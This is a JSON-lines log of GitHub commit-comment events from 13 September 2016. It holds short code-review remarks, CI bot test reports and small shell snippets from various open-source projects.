{"id":"4557940877","type":"CommitCommentEvent","actor":{"login":"serge-v"},"repo":{"name":"Masterminds/glide.sh"},"payload":{"comment":{"id":19007836,"position":12,"line":58,"path":"get","commit_id":"14884b95be1c6736c8fb24b2cfe7529d899e5299","created_at":"2016-09-13T20:05:15Z","updated_at":"2016-09-13T20:05:15Z","body":"similar to initArch?\r\n\r\n`initOS() {\r\n        OS=$(echo `uname`|tr '[:upper:]' '[:lower:]')\r\n        case $OS in\r\n                mingw*) OS='windows';;\r\n        esac\r\n}\r\n`"}},"created_at":"2016-09-13T20:05:15Z"}
{"id":"4557941147","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":19007840,"position":null,"line":null,"path":null,"commit_id":"ddc0d5ee736daa946d1a4c03d150d8e89baf9bd4","created_at":"2016-09-13T20:05:18Z","updated_at":"2016-09-13T20:05:18Z","body":"Yup look like you are right; once referenced as external it should work"}},"created_at":"2016-09-13T20:05:18Z"}
{"id":"4557945035","type":"CommitCommentEvent","actor":{"login":"ahuarte47"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19007850,"position":31,"line":31,"path":"src/core/qgsoptionalexpression.h","commit_id":"8cf0ef93c454a02362377e5bce2d8c8c8b6015a4","created_at":"2016-09-13T20:06:00Z","updated_at":"2016-09-13T20:06:00Z","body":"> Maybe by implementing at least one method the compiler is forced to actually build the object?\r\n\r\nI think so\r\n\r\n> Let's give it a try to add writeXml / readXml methods in QgsOptionalExpression.cpp.\r\n\r\nThanks, I do all tests that you ask me"}},"created_at":"2016-09-13T20:06:00Z"}
{"id":"4557947600","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19007860,"position":null,"line":null,"path":null,"commit_id":"5f84860065c26e07b98500ee0f60d2d2e5d8d755","created_at":"2016-09-13T20:06:29Z","updated_at":"2016-09-13T20:06:29Z","body":"mavrothal how about merging your pox_git stuff into woofce.. although it would be only you doing the merging work, because probably only you own a xo laptop. that script is interesting, i wonder why is that not in woofce?"}},"created_at":"2016-09-13T20:06:29Z"}
{"id":"4557947684","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19007862,"position":null,"line":null,"path":null,"commit_id":"641c3a9f93b4c0c91f930aa8f9eb0f9626298526","created_at":"2016-09-13T20:06:30Z","updated_at":"2016-09-13T20:06:30Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2332 of 2335 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T20:06:30Z"}
{"id":"4557948233","type":"CommitCommentEvent","actor":{"login":"akira-baruah"},"repo":{"name":"cs3157/recitations"},"payload":{"comment":{"id":19007866,"position":null,"line":null,"path":null,"commit_id":"86ae902f1b898322c04105f1b60046271e3d402a","created_at":"2016-09-13T20:06:37Z","updated_at":"2016-09-13T20:06:37Z","body":":+1: defend the Church of Emacs!"}},"created_at":"2016-09-13T20:06:37Z"}
{"id":"4557948301","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19007867,"position":null,"line":null,"path":null,"commit_id":"9cc2adf6b5a386c6a4fe91a1db9343dc890cbcc7","created_at":"2016-09-13T20:06:37Z","updated_at":"2016-09-13T20:06:37Z","body":"See Line number 28, it has comment `<!--PLACEMENTS-->`, which is not semantic. Replace this comment and its closing comment with some meaningful word that defines what is inside that part."}},"created_at":"2016-09-13T20:06:37Z"}
{"id":"4557949878","type":"CommitCommentEvent","actor":{"login":"boyanapr"},"repo":{"name":"boyanapr/test"},"payload":{"comment":{"id":19007872,"position":null,"line":null,"path":null,"commit_id":"f3d381c9e39f1b81f5104f03e25180fe54617460","created_at":"2016-09-13T20:06:54Z","updated_at":"2016-09-13T20:06:54Z","body":"create second file"}},"created_at":"2016-09-13T20:06:54Z"}
{"id":"4557952744","type":"CommitCommentEvent","actor":{"login":"pyllyukko"},"repo":{"name":"pyllyukko/harden.sh"},"payload":{"comment":{"id":19007884,"position":null,"line":null,"path":null,"commit_id":"83ff991f0ec909add6062dfe0207805f88e8cb3a","created_at":"2016-09-13T20:07:24Z","updated_at":"2016-09-13T20:07:24Z","body":"When using the ```useradd -l```, at least ```login``` creates the missing ```lastlog``` entry upon login."}},"created_at":"2016-09-13T20:07:24Z"}
{"id":"4557953944","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19007888,"position":null,"line":null,"path":null,"commit_id":"9cc2adf6b5a386c6a4fe91a1db9343dc890cbcc7","created_at":"2016-09-13T20:07:36Z","updated_at":"2016-09-13T20:07:36Z","body":"In line no. 31, the case of 'student activity centre' is not correct. The First letter of each word must be capital."}},"created_at":"2016-09-13T20:07:36Z"}
{"id":"4557961487","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19007907,"position":null,"line":null,"path":null,"commit_id":"9cc2adf6b5a386c6a4fe91a1db9343dc890cbcc7","created_at":"2016-09-13T20:09:01Z","updated_at":"2016-09-13T20:09:01Z","body":"From line 33 to line 35, there are ids like 'panel-placements' and 'march2015'. Replace them with some meaningful words."}},"created_at":"2016-09-13T20:09:01Z"}
{"id":"4557963828","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"zendframework/zend-code"},"payload":{"comment":{"id":19007917,"position":10,"line":343,"path":"src/Generator/ParameterGenerator.php","commit_id":"1e1ed46359218822923d7f819f37ce4e2450b70b","created_at":"2016-09-13T20:09:26Z","updated_at":"2016-09-13T20:09:26Z","body":"`parent` is also a possible type hint"}},"created_at":"2016-09-13T20:09:26Z"}
{"id":"4557965436","type":"CommitCommentEvent","actor":{"login":"dfcreative"},"repo":{"name":"danigb/audio-loader"},"payload":{"comment":{"id":19007922,"position":3,"line":3,"path":"example/node.js","commit_id":"d6d57ef35c269a62af9e856017580336113f8a97","created_at":"2016-09-13T20:09:43Z","updated_at":"2016-09-13T20:09:43Z","body":"mb better leave it for polyfills? We are not going to support old node’s, and node 4x+ already includes Promise"}},"created_at":"2016-09-13T20:09:43Z"}
{"id":"4557966313","type":"CommitCommentEvent","actor":{"login":"nilzao"},"repo":{"name":"nilzao/soapbox-race-udp"},"payload":{"comment":{"id":19007923,"position":null,"line":null,"path":null,"commit_id":"2c3b4d18a22876e6ee1b12108ec045ebf83e0a1d","created_at":"2016-09-13T20:09:52Z","updated_at":"2016-09-13T20:09:52Z","body":"your question make no sense. \r\nI never unpack or pack the soapbox or nfsw files.\r\n\r\nIt's just a server talking with 2 clients, no modifications."}},"created_at":"2016-09-13T20:09:52Z"}
{"id":"4557967349","type":"CommitCommentEvent","actor":{"login":"kofalt"},"repo":{"name":"Masterminds/glide.sh"},"payload":{"comment":{"id":19007927,"position":12,"line":58,"path":"get","commit_id":"14884b95be1c6736c8fb24b2cfe7529d899e5299","created_at":"2016-09-13T20:10:03Z","updated_at":"2016-09-13T20:10:03Z","body":"Hmm, that works :smile:"}},"created_at":"2016-09-13T20:10:03Z"}
{"id":"4557967682","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19007930,"position":null,"line":null,"path":null,"commit_id":"28be5976c1cfb6c4b31bb757c9dd95b172658276","created_at":"2016-09-13T20:10:09Z","updated_at":"2016-09-13T20:10:09Z","body":"some tests failed:\nfailure: https://travis-ci.org/stellar/stellar-core/builds/159695620\n"}},"created_at":"2016-09-13T20:10:09Z"}
{"id":"4557968438","type":"CommitCommentEvent","actor":{"login":"mvexel"},"repo":{"name":"DenisCarriere/canvec-ogr2osm-translation"},"payload":{"comment":{"id":19007931,"position":null,"line":null,"path":null,"commit_id":"e1ddcb99aad9c705262cb36cde8a9f3bd85ff9ef","created_at":"2016-09-13T20:10:17Z","updated_at":"2016-09-13T20:10:17Z","body":"Interesting that a unicode comment makes Python 2 croak.. It works just fine in P3."}},"created_at":"2016-09-13T20:10:17Z"}
{"id":"4557968720","type":"CommitCommentEvent","actor":{"login":"karmon"},"repo":{"name":"karmon/voucherify-php-sdk"},"payload":{"comment":{"id":19007934,"position":null,"line":null,"path":null,"commit_id":"db8b0d734c65070e5779d35364431e217d7b5bb0","created_at":"2016-09-13T20:10:20Z","updated_at":"2016-09-13T20:10:20Z","body":"I think I have already done that. I tried again but it is up to date. "}},"created_at":"2016-09-13T20:10:20Z"}
{"id":"4557969406","type":"CommitCommentEvent","actor":{"login":"pyllyukko"},"repo":{"name":"pyllyukko/harden.sh"},"payload":{"comment":{"id":19007936,"position":null,"line":null,"path":null,"commit_id":"83ff991f0ec909add6062dfe0207805f88e8cb3a","created_at":"2016-09-13T20:10:28Z","updated_at":"2016-09-13T20:10:28Z","body":"The same goes with SSH."}},"created_at":"2016-09-13T20:10:28Z"}
{"id":"4557971416","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19007938,"position":null,"line":null,"path":null,"commit_id":"9cc2adf6b5a386c6a4fe91a1db9343dc890cbcc7","created_at":"2016-09-13T20:10:49Z","updated_at":"2016-09-13T20:10:49Z","body":"In clubs, add some message like \"Currently no details are available for clubs under this society so check later.\" in the Games and Sports Society"}},"created_at":"2016-09-13T20:10:49Z"}
{"id":"4557977442","type":"CommitCommentEvent","actor":{"login":"mehcode"},"repo":{"name":"stephanemaillard/rn-splash-screen"},"payload":{"comment":{"id":19007950,"position":null,"line":null,"path":null,"commit_id":"c1e0362878fa2cd3330f05d82b3123a531ad1c4d","created_at":"2016-09-13T20:11:56Z","updated_at":"2016-09-13T20:11:56Z","body":"@stephanemaillard Something like http://stackoverflow.com/a/8501398 could be used so you're not maintaining your own fork.\r\n\r\nAlso as you pointed out .. yeah. A proper splash screen would define an image for each resolution."}},"created_at":"2016-09-13T20:11:56Z"}
{"id":"4557982036","type":"CommitCommentEvent","actor":{"login":"Wrzlprnft"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19007956,"position":null,"line":null,"path":null,"commit_id":"5c712cc4ce9a8a59e97cc6c838518a3829594e4a","created_at":"2016-09-13T20:12:49Z","updated_at":"2016-09-13T20:12:49Z","body":"That actually would be pretty awesome, if the game would react to that with a harder set of fight because less wanderer ships..."}},"created_at":"2016-09-13T20:12:49Z"}
{"id":"4557982341","type":"CommitCommentEvent","actor":{"login":"leonardofl"},"repo":{"name":"radar-parlamentar/radar"},"payload":{"comment":{"id":19007960,"position":6,"line":0,"path":"radar_parlamentar/plenaria/views.py","commit_id":"291e78e832f94119cfd0621a369f64960c24d4a0","created_at":"2016-09-13T20:12:52Z","updated_at":"2016-09-13T20:12:52Z","body":"Tks! :)"}},"created_at":"2016-09-13T20:12:52Z"}
{"id":"4557984915","type":"CommitCommentEvent","actor":{"login":"lau-gsn"},"repo":{"name":"devongovett/brotli.js"},"payload":{"comment":{"id":19007967,"position":30,"line":29,"path":"compress.js","commit_id":"809212bbf7fea66eafece50f57a28a9ab1902b7b","created_at":"2016-09-13T20:13:22Z","updated_at":"2016-09-13T20:13:22Z","body":"The params aren't being passed in correctly to the encoder."}},"created_at":"2016-09-13T20:13:22Z"}
{"id":"4557987432","type":"CommitCommentEvent","actor":{"login":"mlubin"},"repo":{"name":"JuliaOpt/JuMP.jl"},"payload":{"comment":{"id":19007972,"position":7,"line":7,"path":"NEWS.md","commit_id":"291d9d973aec99c6053e7127f4b8d0e5275f2d6e","created_at":"2016-09-13T20:13:51Z","updated_at":"2016-09-13T20:13:51Z","body":"It's worth mentioning the API change"}},"created_at":"2016-09-13T20:13:51Z"}
{"id":"4557989197","type":"CommitCommentEvent","actor":{"login":"saraervik"},"repo":{"name":"robertab/dd1352"},"payload":{"comment":{"id":19007976,"position":null,"line":null,"path":null,"commit_id":"057846cd6ed436f46f4a4615d1af0820b3f2558b","created_at":"2016-09-13T20:14:11Z","updated_at":"2016-09-13T20:14:11Z","body":"Som sagt, det blir lite svårt att läsa i och med indenteringen. Som tur är är iallafall java inte så kinkig med det. Men hoppas det blir snyggt på skoldatorn 😄"}},"created_at":"2016-09-13T20:14:11Z"}
{"id":"4557993344","type":"CommitCommentEvent","actor":{"login":"Ocramius"},"repo":{"name":"zendframework/zend-code"},"payload":{"comment":{"id":19007984,"position":10,"line":343,"path":"src/Generator/ParameterGenerator.php","commit_id":"1e1ed46359218822923d7f819f37ce4e2450b70b","created_at":"2016-09-13T20:14:55Z","updated_at":"2016-09-13T20:14:55Z","body":"Argh, didn't know it was possible as a hint. Good catch!"}},"created_at":"2016-09-13T20:14:55Z"}
{"id":"4557993486","type":"CommitCommentEvent","actor":{"login":"mlubin"},"repo":{"name":"JuliaOpt/JuMP.jl"},"payload":{"comment":{"id":19007985,"position":7,"line":7,"path":"NEWS.md","commit_id":"291d9d973aec99c6053e7127f4b8d0e5275f2d6e","created_at":"2016-09-13T20:14:56Z","updated_at":"2016-09-13T20:14:56Z","body":"Also 0.14 docs need to be rebuild and pushed"}},"created_at":"2016-09-13T20:14:56Z"}
{"id":"4557994512","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/renjin"},"payload":{"comment":{"id":19007988,"position":null,"line":null,"path":null,"commit_id":"f4e7f6d13a82d20b436d345989c17c34b0095ead","created_at":"2016-09-13T20:15:09Z","updated_at":"2016-09-13T20:15:09Z","body":"@psolaimani if IntelliJ doesn't recognize the compiled classes from nmath, you can add `math/nmath/target/renjin-nmath-0.9.0-SNAPSHOT.jar` manually to the core module's dependencies."}},"created_at":"2016-09-13T20:15:09Z"}
{"id":"4557996035","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"unified-db/Database"},"payload":{"comment":{"id":19007993,"position":null,"line":null,"path":null,"commit_id":"517eeba3dbfdc70c09cbc2574776d42fa3aa4690","created_at":"2016-09-13T20:15:25Z","updated_at":"2016-09-13T20:15:25Z","body":"[550] :)"}},"created_at":"2016-09-13T20:15:25Z"}
{"id":"4557996174","type":"CommitCommentEvent","actor":{"login":"nickschot"},"repo":{"name":"12StarsMedia/ember-ui-sortable"},"payload":{"comment":{"id":19007994,"position":null,"line":null,"path":null,"commit_id":"6e59321f1e1cea4459c6efed0ad496e68e2e77db","created_at":"2016-09-13T20:15:27Z","updated_at":"2016-09-13T20:15:27Z","body":"Nice! Was just about to ask if an ember upgrade would be worth doing :)"}},"created_at":"2016-09-13T20:15:27Z"}
{"id":"4557998090","type":"CommitCommentEvent","actor":{"login":"dfcreative"},"repo":{"name":"danigb/audio-loader"},"payload":{"comment":{"id":19007999,"position":3,"line":3,"path":"example/node.js","commit_id":"d6d57ef35c269a62af9e856017580336113f8a97","created_at":"2016-09-13T20:15:47Z","updated_at":"2016-09-13T20:15:47Z","body":"Though it is just example, I see"}},"created_at":"2016-09-13T20:15:47Z"}
{"id":"4558001136","type":"CommitCommentEvent","actor":{"login":"tu-chill"},"repo":{"name":"tu-chill/tu-sites-all"},"payload":{"comment":{"id":19008007,"position":null,"line":null,"path":null,"commit_id":"292a1fad556d8cd8d9682b22108b616d16b40e37","created_at":"2016-09-13T20:16:22Z","updated_at":"2016-09-13T20:16:22Z","body":"these images stubbornly showed their mugs after a clean clone. LFS is handling them so maybe that has something to do with something. "}},"created_at":"2016-09-13T20:16:22Z"}
{"id":"4558004248","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"comnom/Contraband"},"payload":{"comment":{"id":19008014,"position":58,"line":58,"path":"data/hails.txt","commit_id":"7d655462edf9740cb4ab4b4dde3a0c6a76af110f","created_at":"2016-09-13T20:16:58Z","updated_at":"2016-09-13T20:16:58Z","body":"\"Go to Hell\"\r\nand\r\n\"I'm gonna send you to hell,\"\r\ncapitalize hell or not?"}},"created_at":"2016-09-13T20:16:58Z"}
{"id":"4558004681","type":"CommitCommentEvent","actor":{"login":"matthamil"},"repo":{"name":"matthamil/Brainify"},"payload":{"comment":{"id":19008015,"position":null,"line":null,"path":null,"commit_id":"546016cf689f0955551895534ef9f1ed11898deb","created_at":"2016-09-13T20:17:03Z","updated_at":"2016-09-13T20:17:03Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;dAbhwHcK&#x2F;2-latest-pr\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Latest PR</a>"}},"created_at":"2016-09-13T20:17:03Z"}
{"id":"4558005876","type":"CommitCommentEvent","actor":{"login":"erikvarga"},"repo":{"name":"erikvarga/gcc"},"payload":{"comment":{"id":19008017,"position":16,"line":2027,"path":"gcc/ams.cc","commit_id":"c80f934150e34da4544cc9bc1e223d5a238d775a","created_at":"2016-09-13T20:17:16Z","updated_at":"2016-09-13T20:17:16Z","body":"There are two reg_use_count and one reg_set_count lookups, and the reg_use_count lookups are in seperate if-branches, so each map's lookup will get executed only once."}},"created_at":"2016-09-13T20:17:16Z"}
{"id":"4558007035","type":"CommitCommentEvent","actor":{"login":"alexcoman"},"repo":{"name":"stefan-caraiman/cloudbase-init"},"payload":{"comment":{"id":19008023,"position":5,"line":149,"path":"cloudbaseinit/conf/default.py","commit_id":"0073e5dbdd27e7692faa3a141e24d37b8371ad7b","created_at":"2016-09-13T20:17:28Z","updated_at":"2016-09-13T20:17:28Z","body":"Not a very good idea."}},"created_at":"2016-09-13T20:17:28Z"}
{"id":"4558008158","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19008026,"position":null,"line":null,"path":null,"commit_id":"9cc2adf6b5a386c6a4fe91a1db9343dc890cbcc7","created_at":"2016-09-13T20:17:41Z","updated_at":"2016-09-13T20:17:41Z","body":"In line no. 63 (right), remove class 'company-profile' and replace with some other class. But after doing this, check whether style is affected or not. If it is affected then undo."}},"created_at":"2016-09-13T20:17:41Z"}
{"id":"4558010124","type":"CommitCommentEvent","actor":{"login":"PRabahy"},"repo":{"name":"tahoe-lafs/tahoe-lafs"},"payload":{"comment":{"id":19008030,"position":274,"line":254,"path":"docs/configuration.rst","commit_id":"50b8a89c001f970a9410084f9e8a533bbc3d659a","created_at":"2016-09-13T20:18:04Z","updated_at":"2016-09-13T20:18:04Z","body":"(Sorry for the random comment)\r\n\r\nI think this documentation now conflicts with https://github.com/tahoe-lafs/tahoe-lafs/commit/2e3ec4109cd5105b1f3cf66297f3da1fba9ddc41#diff-eead337ed57b42e703fe8f51dc925c61R916"}},"created_at":"2016-09-13T20:18:04Z"}
{"id":"4558010253","type":"CommitCommentEvent","actor":{"login":"ToddSmithSalter"},"repo":{"name":"12StarsMedia/ember-ui-sortable"},"payload":{"comment":{"id":19008031,"position":null,"line":null,"path":null,"commit_id":"6e59321f1e1cea4459c6efed0ad496e68e2e77db","created_at":"2016-09-13T20:18:06Z","updated_at":"2016-09-13T20:18:06Z","body":"Definitely. I think the travis tests were failing because a few things were out of date. ¯\\_(ツ)_/¯"}},"created_at":"2016-09-13T20:18:06Z"}
{"id":"4558012527","type":"CommitCommentEvent","actor":{"login":"erikvarga"},"repo":{"name":"erikvarga/gcc"},"payload":{"comment":{"id":19008037,"position":29,"line":2040,"path":"gcc/ams.cc","commit_id":"c80f934150e34da4544cc9bc1e223d5a238d775a","created_at":"2016-09-13T20:18:30Z","updated_at":"2016-09-13T20:18:30Z","body":"Unfortunately, this one uses a different register than the one above, so the result of that lookup can't reused here."}},"created_at":"2016-09-13T20:18:30Z"}
{"id":"4558019184","type":"CommitCommentEvent","actor":{"login":"danigb"},"repo":{"name":"danigb/audio-loader"},"payload":{"comment":{"id":19008050,"position":3,"line":3,"path":"example/node.js","commit_id":"d6d57ef35c269a62af9e856017580336113f8a97","created_at":"2016-09-13T20:19:46Z","updated_at":"2016-09-13T20:19:46Z","body":"Sorry, I used bluebird to debug some promises. The example needs some work\ntoo.\n\nEl El mar, 13 sept 2016 a las 22:15, Dima Yv <notifications@github.com>\nescribió:\n\n> Though it is just example, I see\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/danigb/audio-loader/commit/d6d57ef35c269a62af9e856017580336113f8a97#commitcomment-19007999>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAdIR61NYLXMgjGz0RVOCeI3q4Po_fJks5qpwRzgaJpZM4J8Fwk>\n> .\n>\n"}},"created_at":"2016-09-13T20:19:46Z"}
{"id":"4558021020","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19008056,"position":null,"line":null,"path":null,"commit_id":"024a65cfc57740d33325c00cff4ae42dde294496","created_at":"2016-09-13T20:20:11Z","updated_at":"2016-09-13T20:20:11Z","body":"The following doc(s) have been deployed to the [1869module](https://1869module-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/unsupported-modules-plugins](https://1869module-static-docs.pantheonsite.io/docs/unsupported-modules-plugins)\n"}},"created_at":"2016-09-13T20:20:11Z"}
{"id":"4558026391","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19008070,"position":null,"line":null,"path":null,"commit_id":"9cc2adf6b5a386c6a4fe91a1db9343dc890cbcc7","created_at":"2016-09-13T20:21:08Z","updated_at":"2016-09-13T20:21:08Z","body":"In line no. 61 (right), you will see a long green bar before `<div id=\"collapse-sac-office-bearers\" class=\"panel-collapse collapse in\">`. That bar means, you have added so many spaces before the div element.\r\n\r\nTo make indented nested tags, you should never use spaces to indent the elements. Use enter to come to next line and then to give indentation, use tabs. When you make indentation like this then you will not get green bar.\r\n\r\nThat bar will make code, look unformatted on some text-editors."}},"created_at":"2016-09-13T20:21:08Z"}
{"id":"4558030760","type":"CommitCommentEvent","actor":{"login":"aaronrudkin"},"repo":{"name":"JeffreyBLewis/WebVoteView"},"payload":{"comment":{"id":19008075,"position":null,"line":null,"path":null,"commit_id":"7c6a5f25c20c4622f1bf84fa50472fb5ff790a60","created_at":"2016-09-13T20:21:50Z","updated_at":"2016-09-13T20:21:50Z","body":"This was me; I had SUed to test something unrelated. Whoops."}},"created_at":"2016-09-13T20:21:50Z"}
{"id":"4558030960","type":"CommitCommentEvent","actor":{"login":"kacole2"},"repo":{"name":"emccode/libstorage"},"payload":{"comment":{"id":19008077,"position":null,"line":null,"path":null,"commit_id":"9b5bc23ebc7499dbaca369194d66218b2485d43d","created_at":"2016-09-13T20:21:52Z","updated_at":"2016-09-13T20:21:52Z","body":"can this be rebased with a commit title?"}},"created_at":"2016-09-13T20:21:52Z"}
{"id":"4558036280","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19008091,"position":null,"line":null,"path":null,"commit_id":"9cc2adf6b5a386c6a4fe91a1db9343dc890cbcc7","created_at":"2016-09-13T20:22:51Z","updated_at":"2016-09-13T20:22:51Z","body":"For `collapse-director-nominee`, it's better to use `director-nominee-panel` or `panel-director-nominee` to convey the meaning that this div is a panel for director nominee."}},"created_at":"2016-09-13T20:22:51Z"}
{"id":"4558036856","type":"CommitCommentEvent","actor":{"login":"ahmelsayed"},"repo":{"name":"projectkudu/AzureFunctionsPortal"},"payload":{"comment":{"id":19008093,"position":null,"line":null,"path":null,"commit_id":"2e1d7a7e2dc77a4b117fcf7fa18b4b35be6c13f3","created_at":"2016-09-13T20:22:56Z","updated_at":"2016-09-13T20:22:56Z","body":"? it should work just fine with the scm creds"}},"created_at":"2016-09-13T20:22:56Z"}
{"id":"4558041206","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19008101,"position":18,"line":84,"path":"js/actions/windowActions.js","commit_id":"3ff17ae253093af57f7d6282993eedf0cdf43789","created_at":"2016-09-13T20:23:40Z","updated_at":"2016-09-13T20:23:40Z","body":"long-term we want to move away from setter actions to descriptor actions `setUrl` -> `loadFailed`, but since the rest of this code uses setter actions this seems fine"}},"created_at":"2016-09-13T20:23:40Z"}
{"id":"4558042905","type":"CommitCommentEvent","actor":{"login":"johnslay"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19008108,"position":5,"line":11,"path":"Tests/MethodSwizzling.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T20:23:59Z","updated_at":"2016-09-13T20:23:59Z","body":"Should it be `for class` or `forClass`? [This](https://swift.org/documentation/api-design-guidelines/#weak-type-information) has got me confused about it. "}},"created_at":"2016-09-13T20:23:59Z"}
{"id":"4558043144","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19008109,"position":13,"line":608,"path":"test/components/navigationBarTest.js","commit_id":"3ff17ae253093af57f7d6282993eedf0cdf43789","created_at":"2016-09-13T20:24:02Z","updated_at":"2016-09-13T20:24:02Z","body":"I don't think this test title is correct anymore. It should revert to the previous url, correct?"}},"created_at":"2016-09-13T20:24:02Z"}
{"id":"4558052816","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19008129,"position":5,"line":61,"path":"src/System.IO.Compression/tests/System.IO.Compression.Tests.csproj","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T20:25:48Z","updated_at":"2016-09-13T20:25:48Z","body":"You are right, I forgot to update the project.json, I'll fix this."}},"created_at":"2016-09-13T20:25:48Z"}
{"id":"4558053302","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19008131,"position":null,"line":null,"path":null,"commit_id":"641c3a9f93b4c0c91f930aa8f9eb0f9626298526","created_at":"2016-09-13T20:25:53Z","updated_at":"2016-09-13T20:25:53Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1762 of 1763 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-13T20:25:53Z"}
{"id":"4558053644","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19008133,"position":5,"line":11,"path":"Tests/MethodSwizzling.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T20:25:58Z","updated_at":"2016-09-13T20:25:58Z","body":"`for class` is good because the type `AnyClass` already lets you know that it's a class. So, `forClass` would be redundant here."}},"created_at":"2016-09-13T20:25:58Z"}
{"id":"4558061742","type":"CommitCommentEvent","actor":{"login":"LeeKamentsky"},"repo":{"name":"LeeKamentsky/python-javabridge"},"payload":{"comment":{"id":19008149,"position":null,"line":null,"path":null,"commit_id":"d51cab26a5df3e2c6d33af129d07b9734b6ff663","created_at":"2016-09-13T20:27:23Z","updated_at":"2016-09-13T20:27:23Z","body":"@ericspivey It looks like you haven't got Numpy installed. For Ubuntu, the best way to do this is to install the package via apt-get:\r\n\r\n    apt-get python-numpy\r\n"}},"created_at":"2016-09-13T20:27:23Z"}
{"id":"4558061761","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19008150,"position":13,"line":608,"path":"test/components/navigationBarTest.js","commit_id":"3ff17ae253093af57f7d6282993eedf0cdf43789","created_at":"2016-09-13T20:27:23Z","updated_at":"2016-09-13T20:27:23Z","body":"yup i should fix that. also this test is failing in travis but passes locally somehow: https://travis-ci.org/brave/browser-laptop/builds/159697369. "}},"created_at":"2016-09-13T20:27:23Z"}
